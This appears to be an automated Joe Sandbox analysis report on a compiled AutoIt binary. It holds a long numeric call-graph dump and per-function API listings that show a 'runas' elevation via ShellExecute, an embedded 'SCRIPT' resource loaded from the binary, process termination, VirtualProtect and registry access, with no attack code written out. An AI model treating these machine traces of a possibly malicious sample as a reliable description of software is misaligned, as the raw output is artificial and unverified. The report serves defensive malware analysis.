__fread_nolock 96917->96918 96919 5d93c0 96917->96919 96918->96564 96919->96918 96920 5daec9 22 API calls 96919->96920 96920->96918 96922 5da6dd 96921->96922 96923 5da6d0 96921->96923 96924 5efddb 22 API calls 96922->96924 96923->96565 96925 5da6e7 96924->96925 96926 5efe0b 22 API calls 96925->96926 96926->96923 
96927->96586 96928->96909 96930 5d6382 96929->96930 96936 5d63b6 __fread_nolock 96929->96936 96931 614a82 96930->96931 96932 5d63a9 96930->96932 96930->96936 96933 5efddb 22 API calls 96931->96933 96934 5da587 22 API calls 96932->96934 96935 614a91 96933->96935 96934->96936 96937 5efe0b 22 API calls 96935->96937 96936->96597 96938 614ac5 __fread_nolock 96937->96938 96939->96598 96940->96640 96941->96642 96942->96692 96944 5fdbc1 96943->96944 96950 5fdbdd 96943->96950 96945 5fdbcd 96944->96945 96946 5fdbe3 96944->96946 96944->96950 96980 5ff2d9 20 API calls _free 96945->96980 96977 5fd9cc 96946->96977 96949 5fdbd2 96981 6027ec 26 API calls pre_c_initialization 96949->96981 96950->96695 96953 5fe684 __FrameHandler3::FrameUnwindToState 96952->96953 96954 5fe6aa 96953->96954 96955 5fe695 96953->96955 96964 5fe6a5 __wsopen_s 96954->96964 97137 5f918d EnterCriticalSection 96954->97137 97154 5ff2d9 20 API calls _free 96955->97154 96957 5fe69a 97155 6027ec 26 API calls pre_c_initialization 96957->97155 96959 5fe6c6 97138 5fe602 96959->97138 96962 5fe6d1 97156 5fe6ee LeaveCriticalSection __fread_nolock 96962->97156 96964->96696 96966 643013 96965->96966 96967 642fff SetFileTime CloseHandle 96965->96967 96966->96674 96967->96966 96972 642e7a 96968->96972 96969 5d50f5 40 API calls 96969->96972 96970 6428fe 27 API calls 96970->96972 96971 6429c4 96971->96674 96974 5fd583 26 API calls 96971->96974 96972->96969 96972->96970 96972->96971 96973 5d511f 64 API calls 96972->96973 96973->96972 96974->96675 96975->96683 96976->96708 96982 5fd97b 96977->96982 96979 5fd9f0 96979->96950 96980->96949 96981->96950 96983 5fd987 __FrameHandler3::FrameUnwindToState 96982->96983 96990 5f918d EnterCriticalSection 96983->96990 96985 5fd995 96991 5fd9f4 96985->96991 96989 5fd9b3 __wsopen_s 96989->96979 96990->96985 96999 6049a1 96991->96999 96997 5fd9a2 96998 5fd9c0 LeaveCriticalSection __fread_nolock 96997->96998 96998->96989 97020 5fd955 96999->97020 97001 6049b0 97027 60f89b 97001->97027 97003 
6049b6 97007 5fda09 97003->97007 97036 603820 21 API calls _free 97003->97036 97005 604a15 97006 6029c8 _free 20 API calls 97005->97006 97006->97007 97008 5fda3a 97007->97008 97011 5fda4c 97008->97011 97014 5fda24 97008->97014 97009 5fda5a 97067 5ff2d9 20 API calls _free 97009->97067 97011->97009 97011->97014 97017 5fda85 __fread_nolock 97011->97017 97012 5fda5f 97068 6027ec 26 API calls pre_c_initialization 97012->97068 97019 604a56 62 API calls 97014->97019 97016 5fd955 __fread_nolock 26 API calls 97016->97017 97017->97014 97017->97016 97042 6059be 97017->97042 97069 5fdc0b 97017->97069 97019->96997 97021 5fd976 97020->97021 97022 5fd961 97020->97022 97021->97001 97037 5ff2d9 20 API calls _free 97022->97037 97024 5fd966 97038 6027ec 26 API calls pre_c_initialization 97024->97038 97026 5fd971 97026->97001 97028 60f8a8 97027->97028 97029 60f8b5 97027->97029 97039 5ff2d9 20 API calls _free 97028->97039 97031 60f8c1 97029->97031 97040 5ff2d9 20 API calls _free 97029->97040 97031->97003 97033 60f8ad 97033->97003 97034 60f8e2 97041 6027ec 26 API calls pre_c_initialization 97034->97041 97036->97005 97037->97024 97038->97026 97039->97033 97040->97034 97041->97033 97043 6059ca __FrameHandler3::FrameUnwindToState 97042->97043 97044 6059d2 97043->97044 97045 6059ea 97043->97045 97129 5ff2c6 20 API calls _free 97044->97129 97047 605a88 97045->97047 97051 605a1f 97045->97051 97134 5ff2c6 20 API calls _free 97047->97134 97048 6059d7 97130 5ff2d9 20 API calls _free 97048->97130 97075 605147 EnterCriticalSection 97051->97075 97052 605a8d 97135 5ff2d9 20 API calls _free 97052->97135 97053 6059df __wsopen_s 97053->97017 97056 605a25 97058 605a41 97056->97058 97059 605a56 97056->97059 97057 605a95 97136 6027ec 26 API calls pre_c_initialization 97057->97136 97131 5ff2d9 20 API calls _free 97058->97131 97076 605aa9 97059->97076 97063 605a46 97132 5ff2c6 20 API calls _free 97063->97132 97064 605a51 97133 605a80 LeaveCriticalSection __wsopen_s 97064->97133 97067->97012 97068->97014 
97070 5fdc23 97069->97070 97074 5fdc1f 97069->97074 97071 5fd955 __fread_nolock 26 API calls 97070->97071 97070->97074 97072 5fdc43 97071->97072 97073 6059be __wsopen_s 62 API calls 97072->97073 97073->97074 97074->97017 97075->97056 97077 605ad7 97076->97077 97115 605ad0 97076->97115 97078 605afa 97077->97078 97079 605adb 97077->97079 97083 605b4b 97078->97083 97084 605b2e 97078->97084 97080 5ff2c6 __dosmaperr 20 API calls 97079->97080 97082 605ae0 97080->97082 97081 5f0a8c _ValidateLocalCookies 5 API calls 97085 605cb1 97081->97085 97086 5ff2d9 _free 20 API calls 97082->97086 97087 605b61 97083->97087 97090 609424 __wsopen_s 28 API calls 97083->97090 97088 5ff2c6 __dosmaperr 20 API calls 97084->97088 97085->97064 97089 605ae7 97086->97089 97091 60564e __wsopen_s 39 API calls 97087->97091 97092 605b33 97088->97092 97093 6027ec pre_c_initialization 26 API calls 97089->97093 97090->97087 97094 605b6a 97091->97094 97095 5ff2d9 _free 20 API calls 97092->97095 97093->97115 97096 605ba8 97094->97096 97097 605b6f 97094->97097 97098 605b3b 97095->97098 97099 605c02 WriteFile 97096->97099 97100 605bbc 97096->97100 97101 605b73 97097->97101 97102 605b95 97097->97102 97103 6027ec pre_c_initialization 26 API calls 97098->97103 97107 605c25 GetLastError 97099->97107 97109 605b8b 97099->97109 97104 605bf2 97100->97104 97105 605bc4 97100->97105 97106 605c69 97101->97106 97112 6055e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 97101->97112 97108 60542e __wsopen_s 45 API calls 97102->97108 97103->97115 97113 6056c4 __wsopen_s 7 API calls 97104->97113 97110 605be2 97105->97110 97111 605bc9 97105->97111 97114 5ff2d9 _free 20 API calls 97106->97114 97106->97115 97107->97109 97108->97109 97109->97106 97109->97115 97120 605c45 97109->97120 97117 605891 __wsopen_s 8 API calls 97110->97117 97111->97106 97116 605bd2 97111->97116 97112->97109 97118 605be0 97113->97118 97119 605c8e 97114->97119 97115->97081 97121 6057a3 __wsopen_s 7 API calls 97116->97121 97117->97118 97118->97109 
97122 5ff2c6 __dosmaperr 20 API calls 97119->97122 97123 605c60 97120->97123 97124 605c4c 97120->97124 97121->97118 97122->97115 97126 5ff2a3 __dosmaperr 20 API calls 97123->97126 97125 5ff2d9 _free 20 API calls 97124->97125 97127 605c51 97125->97127 97126->97115 97128 5ff2c6 __dosmaperr 20 API calls 97127->97128 97128->97115 97129->97048 97130->97053 97131->97063 97132->97064 97133->97053 97134->97052 97135->97057 97136->97053 97137->96959 97139 5fe60f 97138->97139 97141 5fe624 97138->97141 97176 5ff2d9 20 API calls _free 97139->97176 97142 5fdc0b 62 API calls 97141->97142 97147 5fe61f 97141->97147 97144 5fe638 97142->97144 97143 5fe614 97177 6027ec 26 API calls pre_c_initialization 97143->97177 97157 604d7a 97144->97157 97147->96962 97149 5fd955 __fread_nolock 26 API calls 97150 5fe646 97149->97150 97161 60862f 97150->97161 97153 6029c8 _free 20 API calls 97153->97147 97154->96957 97155->96964 97156->96964 97158 604d90 97157->97158 97159 5fe640 97157->97159 97158->97159 97160 6029c8 _free 20 API calls 97158->97160 97159->97149 97160->97159 97162 60863e 97161->97162 97166 608653 97161->97166 97181 5ff2c6 20 API calls _free 97162->97181 97164 60868e 97183 5ff2c6 20 API calls _free 97164->97183 97165 608643 97182 5ff2d9 20 API calls _free 97165->97182 97166->97164 97169 60867a 97166->97169 97178 608607 97169->97178 97170 608693 97184 5ff2d9 20 API calls _free 97170->97184 97173 60869b 97185 6027ec 26 API calls pre_c_initialization 97173->97185 97174 5fe64c 97174->97147 97174->97153 97176->97143 97177->97147 97186 608585 97178->97186 97180 60862b 97180->97174 97181->97165 97182->97174 97183->97170 97184->97173 97185->97174 97187 608591 __FrameHandler3::FrameUnwindToState 97186->97187 97197 605147 EnterCriticalSection 97187->97197 97189 60859f 97190 6085d1 97189->97190 97191 6085c6 97189->97191 97198 5ff2d9 20 API calls _free 97190->97198 97192 6086ae __wsopen_s 29 API calls 97191->97192 97194 6085cc 97192->97194 97199 6085fb LeaveCriticalSection __wsopen_s 
97194->97199 97196 6085ee __wsopen_s 97196->97180 97197->97189 97198->97194 97199->97196 97201 5d33fe _wcslen 97200->97201 97202 61311d 97201->97202 97203 5d3411 97201->97203 97204 5efddb 22 API calls 97202->97204 97205 5da587 22 API calls 97203->97205 97206 613127 97204->97206 97207 5d341e __fread_nolock 97205->97207 97208 5efe0b 22 API calls 97206->97208 97207->96716 97209 613157 __fread_nolock 97208->97209 97210->96731 97212 63d4d5 97211->97212 97213 63dbdc GetFileAttributesW 97211->97213 97212->96142 97213->97212 97214 63dbe8 FindFirstFileW 97213->97214 97214->97212 97215 63dbf9 FindClose 97214->97215 97215->97212 97217 5d7510 53 API calls 97216->97217 97218 657f90 97217->97218 97240 657fd5 ISource 97218->97240 97254 658cd3 97218->97254 97220 658281 97221 65844f 97220->97221 97225 65828f 97220->97225 97294 658ee4 60 API calls 97221->97294 97224 65845e 97224->97225 97226 65846a 97224->97226 97267 657e86 97225->97267 97226->97240 97227 5d7510 53 API calls 97245 658049 97227->97245 97232 6582c8 97282 5efc70 97232->97282 97235 658302 97289 5d63eb 22 API calls 97235->97289 97236 6582e8 97288 64359c 82 API calls __wsopen_s 97236->97288 97239 658311 97290 5d6a50 22 API calls 97239->97290 97240->96403 97241 6582f3 GetCurrentProcess TerminateProcess 97241->97235 97243 65832a 97253 658352 97243->97253 97291 5e04f0 22 API calls 97243->97291 97245->97220 97245->97227 97245->97240 97286 63417d 22 API calls __fread_nolock 97245->97286 97287 65851d 42 API calls _strftime 97245->97287 97246 6584c5 97246->97240 97248 6584d9 FreeLibrary 97246->97248 97247 658341 97292 658b7b 75 API calls 97247->97292 97248->97240 97252 5daceb 23 API calls 97252->97253 97253->97246 97253->97252 97293 5e04f0 22 API calls 97253->97293 97295 658b7b 75 API calls 97253->97295 97255 5daec9 22 API calls 97254->97255 97256 658cee CharLowerBuffW 97255->97256 97296 638e54 97256->97296 97260 5da961 22 API calls 97261 658d2a 97260->97261 97262 5d6d25 22 API calls 97261->97262 97263 658d3e 97262->97263 97264 
5d93b2 22 API calls 97263->97264 97266 658d48 _wcslen 97264->97266 97265 658e5e _wcslen 97265->97245 97266->97265 97303 65851d 42 API calls _strftime 97266->97303 97268 657ea1 97267->97268 97269 657eec 97267->97269 97270 5efe0b 22 API calls 97268->97270 97273 659096 97269->97273 97271 657ec3 97270->97271 97271->97269 97272 5efddb 22 API calls 97271->97272 97272->97271 97274 6592ab ISource 97273->97274 97281 6590ba _strcat _wcslen 97273->97281 97274->97232 97275 5db567 39 API calls 97275->97281 97276 5db38f 39 API calls 97276->97281 97277 5db6b5 39 API calls 97277->97281 97278 5d7510 53 API calls 97278->97281 97279 5fea0c 21 API calls ___std_exception_copy 97279->97281 97281->97274 97281->97275 97281->97276 97281->97277 97281->97278 97281->97279 97306 63efae 24 API calls _wcslen 97281->97306 97283 5efc85 97282->97283 97284 5efd1d VirtualProtect 97283->97284 97285 5efceb 97283->97285 97284->97285 97285->97235 97285->97236 97286->97245 97287->97245 97288->97241 97289->97239 97290->97243 97291->97247 97292->97253 97293->97253 97294->97224 97295->97253 97297 638e74 _wcslen 97296->97297 97298 638f63 97297->97298 97301 638ea9 97297->97301 97302 638f68 97297->97302 97298->97260 97298->97266 97301->97298 97304 5ece60 41 API calls 97301->97304 97302->97298 97305 5ece60 41 API calls 97302->97305 97303->97265 97304->97301 97305->97302 97306->97281 97307->96425 97309 5dae01 97308->97309 97312 5dae1c ISource 97308->97312 97310 5daec9 22 API calls 97309->97310 97311 5dae09 CharUpperBuffW 97310->97311 97311->97312 97312->96159 97314 5dacae 97313->97314 97315 5dacd1 97314->97315 97350 64359c 82 API calls __wsopen_s 97314->97350 97315->96185 97318 61fadb 97317->97318 97319 5dad92 97317->97319 97320 5efddb 22 API calls 97319->97320 97321 5dad99 97320->97321 97351 5dadcd 97321->97351 97325 61f86f 97324->97325 97328 5da718 97324->97328 97326 61f87f 97325->97326 97370 634d4a 22 API calls ISource 97325->97370 97329 5da746 97328->97329 97334 5da763 ISource 97328->97334 97358 5daf8a 

                                                                                 Control-flow Graph
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 005D430D
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • GetCurrentProcess.KERNEL32(?,0066CB64,00000000,?,?), ref: 005D4422
                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 005D4429
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 005D4454
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005D4466
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 005D4474
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 005D447B
                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 005D44A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                • API String ID: 3290436268-3101561225
                                                                                • Opcode ID: c7dfaecc9cbb2905997f6da12a6d14750935640c66cee1fe0572f76e40fb8831
                                                                                • Instruction ID: 59e376a22e45d12bb2042e10b5a884806188669c55b1463747b93ac5f6100ced
                                                                                • Opcode Fuzzy Hash: c7dfaecc9cbb2905997f6da12a6d14750935640c66cee1fe0572f76e40fb8831
                                                                                • Instruction Fuzzy Hash: 3BA1916190A6E0DFCF21EF6D78401E57FE77B27340F08689AD0819BB62D6706988CF65

                                                                                 Control-flow Graph
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005D50AA,?,?,00000000,00000000), ref: 005D42B2
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005D50AA,?,?,00000000,00000000), ref: 005D42C9
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20), ref: 006135BE
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20), ref: 006135D3
                                                                                • LockResource.KERNEL32(005D50AA,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20,?), ref: 006135E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 998065ab5100cd6b988080ae65b8f6734b4b03592624ed03ca2f06c92038cd5d
                                                                                • Instruction ID: cf69c9c1d30a5f3a7f3755b631b35847fe8ea26174c0ffc0e82e80015da85a54
                                                                                • Opcode Fuzzy Hash: 998065ab5100cd6b988080ae65b8f6734b4b03592624ed03ca2f06c92038cd5d
                                                                                • Instruction Fuzzy Hash: 10117C74200B01BFE7218B69DC48F677BBEEBC5B61F14816AF846D6350DBB1DD009A60

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 005D2B6B
                                                                                  • Part of subcall function 005D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1418,?,005D2E7F,?,?,?,00000000), ref: 005D3A78
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00692224), ref: 00612C10
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00692224), ref: 00612C17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                • String ID: runas
                                                                                • API String ID: 448630720-4000483414
                                                                                • Opcode ID: 189409e358737b074a01509bbba4c049d835b039a40dc5bea046ea855fdd37ee
                                                                                • Instruction ID: cb875cb172d9e19fe290f6770fb4bfba21fe9c8a4362b903275e3cae874b4569
                                                                                • Opcode Fuzzy Hash: 189409e358737b074a01509bbba4c049d835b039a40dc5bea046ea855fdd37ee
                                                                                • Instruction Fuzzy Hash: 5A11BB312083435AD724FF6CD8599BE7FA6BBE6750F04141FF082562A2CF61494AD713
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,00615222), ref: 0063DBCE
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0063DBDD
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0063DBEE
                                                                                • FindClose.KERNEL32(00000000), ref: 0063DBFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: d4fec68f29f840d69fe43d771d3d2f4d3f0bf3cbd1e05bf4cb0bdca0bcc483b2
                                                                                • Instruction ID: 7b3aa2fbe15a827ac916c31ff358473973d5170cb4871a479b8ab476f50efd50
                                                                                • Opcode Fuzzy Hash: d4fec68f29f840d69fe43d771d3d2f4d3f0bf3cbd1e05bf4cb0bdca0bcc483b2
                                                                                • Instruction Fuzzy Hash: 34F0A0B082091057C3206B78AC0D8BA776E9F02374F106702F8B6C22E0EBF09A5586D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: p#j
                                                                                • API String ID: 3964851224-3095285349
                                                                                • Opcode ID: 33c7693b29437a2a7a095b53f41e4040a002aaacbd722d7913f8708b79d0b857
                                                                                • Instruction ID: 15c520fef14d4c32bad02094485376768aaec2d03d5559e8c2e4fc79d45adf46
                                                                                • Opcode Fuzzy Hash: 33c7693b29437a2a7a095b53f41e4040a002aaacbd722d7913f8708b79d0b857
                                                                                • Instruction Fuzzy Hash: D3A258706083529FD724DF18C484B6ABBE1BF89304F14896EE89A9B352D771EC45CF92
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 005DD807
                                                                                • timeGetTime.WINMM ref: 005DDA07
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB28
                                                                                • TranslateMessage.USER32(?), ref: 005DDB7B
                                                                                • DispatchMessageW.USER32(?), ref: 005DDB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 005DDBB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 2189390790-0
                                                                                • Opcode ID: 574f17a45401ee83bfdd4ca7ada0ec7b3bc34910656d1c632640e4b407c75e85
                                                                                • Instruction ID: cb00c8c3d07955d792f0f0418e8f699ba810535bba048e4c0c64d7e2ed234a13
                                                                                • Opcode Fuzzy Hash: 574f17a45401ee83bfdd4ca7ada0ec7b3bc34910656d1c632640e4b407c75e85
                                                                                • Instruction Fuzzy Hash: 9C42C330608642EFD734DF28D854BAABBB2BF46314F14855BE4958B391D771E844CFA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 005D2D07
                                                                                • RegisterClassExW.USER32(00000030), ref: 005D2D31
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D2D42
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 005D2D5F
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D2D6F
                                                                                • LoadIconW.USER32(000000A9), ref: 005D2D85
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D2D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 121b6a6a6e8762139e365b1bc254bcaefe27fb6114374e8c543223a2f51bdb62
                                                                                • Instruction ID: 6e47a437f9c65f56e95d4876de84832cf65a562f6e3e7fc1d11d957aa11f6066
                                                                                • Opcode Fuzzy Hash: 121b6a6a6e8762139e365b1bc254bcaefe27fb6114374e8c543223a2f51bdb62
                                                                                • Instruction Fuzzy Hash: B521E3B5901318AFDB00EFA4E849BEEBFB6FB0A721F00511AF551AA2A0D7B11544CF91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0061039A: CreateFileW.KERNELBASE(00000000,00000000,?,00610704,?,?,00000000,?,00610704,00000000,0000000C), ref: 006103B7
                                                                                • GetLastError.KERNEL32 ref: 0061076F
                                                                                • __dosmaperr.LIBCMT ref: 00610776
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00610782
                                                                                • GetLastError.KERNEL32 ref: 0061078C
                                                                                • __dosmaperr.LIBCMT ref: 00610795
                                                                                • CloseHandle.KERNEL32(00000000), ref: 006107B5
                                                                                • CloseHandle.KERNEL32(?), ref: 006108FF
                                                                                • GetLastError.KERNEL32 ref: 00610931
                                                                                • __dosmaperr.LIBCMT ref: 00610938
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: d9da52d9082221312aa4cbc5f481e600d4c2da53e870eeacb8586744edd160ee
                                                                                • Instruction ID: 1798ea5f7325338798029abd64ce6ef5554c59f3f50ba091bca0b282bdd8ca53
                                                                                • Opcode Fuzzy Hash: d9da52d9082221312aa4cbc5f481e600d4c2da53e870eeacb8586744edd160ee
                                                                                • Instruction Fuzzy Hash: BDA13632A041098FEF19AF68DC51BEE3BA2AF46320F18015DF815AB3D1D7759C92CB91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 005D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1418,?,005D2E7F,?,?,?,00000000), ref: 005D3A78
                                                                                  • Part of subcall function 005D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005D3379
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005D356A
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0061318D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006131CE
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00613210
                                                                                • _wcslen.LIBCMT ref: 00613277
                                                                                • _wcslen.LIBCMT ref: 00613286
